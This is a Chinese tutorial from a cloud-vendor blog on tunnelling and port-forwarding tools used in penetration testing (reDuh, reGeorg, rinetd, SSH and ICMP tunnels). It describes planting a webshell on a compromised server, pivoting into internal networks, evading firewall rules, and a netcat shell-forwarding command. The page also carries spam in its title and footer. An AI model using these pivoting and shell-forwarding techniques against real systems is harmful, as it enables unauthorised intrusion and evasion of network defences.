中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

web安全中端口轉發流量操控工具有哪些

發布時間:2021-12-27 14:51:11 來源:億速云 閱讀:320 作者:小新 欄目:網絡管理

這篇文章主要為大家展示了“web安全中端口轉發流量操控工具有哪些”,內容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領大家一起研究并學習一下“web安全中端口轉發流量操控工具有哪些”這篇文章吧。

運用情景:

在 Web 安全滲透測試經常會面臨的一個問題,同時也是 Web 服務器加固方面一個很重要的部分,那就是 Web 服務器對外只開放一個 80 端口。Web 服務器的安全防護可以是操作系統的端口定制或者是網管防火前的端口定制。這時滲透測試人員如果想進一步測試內網的話必須先拿下目標服務器并擁有一定的控制權限。 以前滲透測試人員常用的一些方法是通過上傳一些針對操作系統的可執行文件到目標服務器,并且必須要通過進程的方式執行該程序。但由于種種限制,所以陸續出現了不同類型的端口轉發與流量操控工具。

工具初探:

2.1 reDuh

工作原理:

我想大部分的測試人員都比我懂什么叫端口轉發,說白了,reDuh 就是一款由腳本(asp; php; jsp)實現的端口轉發器。其實這個轉發器通過了兩次中轉,我們下面以遠程桌面服務連接做個圖例說明:

web安全中端口轉發流量操控工具有哪些

由圖示上我們也可以看出,從 MSTSC 客戶端到目標的 Terminal 服務器中間其實是走了一個這樣的流程:

 Mstsc 客戶端-->reDuh 代理-->HTTP tunne-->Web 服務器-->Terminal 服務器

當然,對于 MSTSC 客戶端而言,這些過程都是透明的,我們只需要在 MSTSC 中指定連接的端口為本地 reDuh 監聽的端口即可。

軟件使用:

1)運行 reDuhGUI 程序,出現如下界面。在 URL 輸入框中輸入 reDuh 的地址,點擊 Start 按鈕:

web安全中端口轉發流量操控工具有哪些

2) 如果目標 URL 存在且工作正常,那么界面上會變成如下的樣式,我們可以看到,Create 按鈕的狀態變為可用,這是,我們在 Create Tunnel 中輸入目標服務器需要連接的地址和端口,以及本地監聽的端口號,點擊 Create 按鈕。這里需要注意的是 Remote Host 的地址不是目標服務器的 IP 地址,而是目標服務器可以訪問的任意地址,假設目標服務器的地址為 10.10.10.10,那么如果 Remote Host 為 127.0.0.1,其實就相當于連接服務器上的地址;如果 Remote Host 為 10.10.10.11,那么相當于讓服務器去連接內網的另一臺服務器:

web安全中端口轉發流量操控工具有哪些

3) 這時界面上會加入一條數據到列表框,說明本地監聽到端口 1234,對應于目標服務器連接的 127.0.0.1:3389 端點:

web安全中端口轉發流量操控工具有哪些

創建 HTTP 隧道成功后,我們可以使用 MSTSC 來進行連接測試,在 Computer 中輸入對應的本地監聽地址,選擇連接:

web安全中端口轉發流量操控工具有哪些

4)這時我們可以從程序的日志框中查看到大量的數據傳輸:

web安全中端口轉發流量操控工具有哪些

5) 在 MSTSC 中能夠正常的連接遠程桌面:

web安全中端口轉發流量操控工具有哪些

6) 如果我們完成了操作需要斷開時,可以在右邊的列表框中選擇一項,然后點擊 Close 按鈕完成某條鏈路的銷毀; 如果想完全斷開當前的連接,可以點擊 Kill 按鈕:

2.2 reGeorg+Proxifier

運行環境:pythony 以及 urllib3

下載地址:https://github.com/sensepost/reGeorg.git

原理大同小異,我就不解釋了,直接上測試使用過程。

運用情景:

在內網測試的時候,mysql 為 root 權限,讀到配置文件,得到網站的根目錄,寫下馬,菜刀連之,發現是 system 權限,而且 3389 端口開放這時候出現了問題,外網訪問 3389 端口的時候,發現連接不上,只對內網開放。這就很尷尬了,我在內網中,服務器也在內網中,而且我沒有公網機器。這個時候就需要使用 reGeorg+Proxifier

reGeorg 使用方法:

先將 reGeorg 的對應腳本上傳到服務器端,reGeorg 提供了 PHP、ASPX、JSP 腳本,直接訪問顯示「Georg says, 'All seems fine'」,表示腳本運行正常。

web安全中端口轉發流量操控工具有哪些

運行命令提示符下切換到 C:\Python27\,運行 python reGeorgSocksProxy.py -u (上傳 reGeorg 腳本的地址) -p (轉發端口),參數順序無強制要求。

web安全中端口轉發流量操控工具有哪些

由于是基于 socks5, 本地還需安裝一個 socks5 代理工具此類工具網上很多,就以 Proxifier 為例子

web安全中端口轉發流量操控工具有哪些

然后將代理規則改成 proxy socket5 127.0.0.1

web安全中端口轉發流量操控工具有哪些

這時候訪問,成功進入連上 3389

2.3 rinetd 實現流量轉發

實例:

web安全中端口轉發流量操控工具有哪些

公司的的防火墻只允許 53 端口的出站流量(但是入站流量還是允許的),想通過 80 端口上網,被拒絕。

解決思路:通過在家里放置一臺機器,使用公司的電腦去訪問家里的 53 端口,家里的電腦 20.1.1.1 通過流量轉發吧網站的流量返回給公司的網絡。

安裝:

apt-get install rinetd

web安全中端口轉發流量操控工具有哪些

配置:

Vim  /etc/rinetd.conf

web安全中端口轉發流量操控工具有哪些

啟動:rinetd

確定進程是否啟動:

web安全中端口轉發流量操控工具有哪些

從 XP 系統訪問 kali(IP:1.1.1.16)的 53 端口,發現可以訪問 110 的網站

web安全中端口轉發流量操控工具有哪些

轉發 shell

在 192.168.1.110 機器上偵聽 333 端口

web安全中端口轉發流量操控工具有哪些

在 kali 上轉發 333 端口:

web安全中端口轉發流量操控工具有哪些

重啟服務:

web安全中端口轉發流量操控工具有哪些

在內網機器 1.1.1.12 輸入,命令:nc 192.168.1.16 53(連接 kali)

web安全中端口轉發流量操控工具有哪些

發現成功得到內網機器的控制權:

web安全中端口轉發流量操控工具有哪些

2.4 其他:

SSH 穿透

 ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

SSH 穿透從一個網絡到另一個網絡

 ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target

ptunnle-Ping tunnel ICMP

通過 ICMP echo(ping requests)和 reply(ping reply) 實現隧道

服務器:

ptunnel -x 1234(-x 設置密碼)

客戶端:

sudo ptunnel -p proxy -lp 2222 -da destination -dp 22 -x 1234(da 就是目標地址 dp 目標端口 -x 密碼)

嵌套 SSH 隧道:

ssh -CNfg -D 7000 root@127.0.0.1 -p 2222

以上是“web安全中端口轉發流量操控工具有哪些”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節
推薦閱讀:
  1. web安全
  2. VTY遠程操控

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

web
AI

关岭| 喜德县| 靖宇县| 井冈山市| 亚东县| 五河县| 湘潭县| 文安县| 宁德市| 江陵县| 苗栗市| 常宁市| 蒲城县| 龙陵县| 涞源县| 古交市| 海城市| 集安市| 长垣县| 宾阳县| 平罗县| 玉田县| 开阳县| 壤塘县| 鄂托克前旗| 福贡县| 闵行区| 兴宁市| 南投县| 兴业县| 伊春市| 多伦县| 新泰市| 三江| 保德县| 临高县| 庆城县| 沂源县| 丹江口市| 灵丘县| 临城县|